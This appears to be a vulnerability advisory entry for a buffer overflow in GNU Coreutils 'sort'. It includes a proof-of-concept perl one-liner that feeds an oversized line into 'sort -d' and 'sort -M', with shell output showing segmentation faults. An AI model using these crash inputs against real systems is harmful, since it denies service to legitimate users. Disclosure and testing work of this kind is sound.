13 lines
No EOL
713 B
Text
13 lines
No EOL
713 B
Text
source: http://www.securityfocus.com/bid/57492/info
|
|
|
|
GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.
|
|
|
|
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed.
|
|
|
|
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
|
|
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
|
|
13432 segmentation fault sort -d
|
|
|
|
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
|
|
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
|
|
13434 segmentation fault sort -M |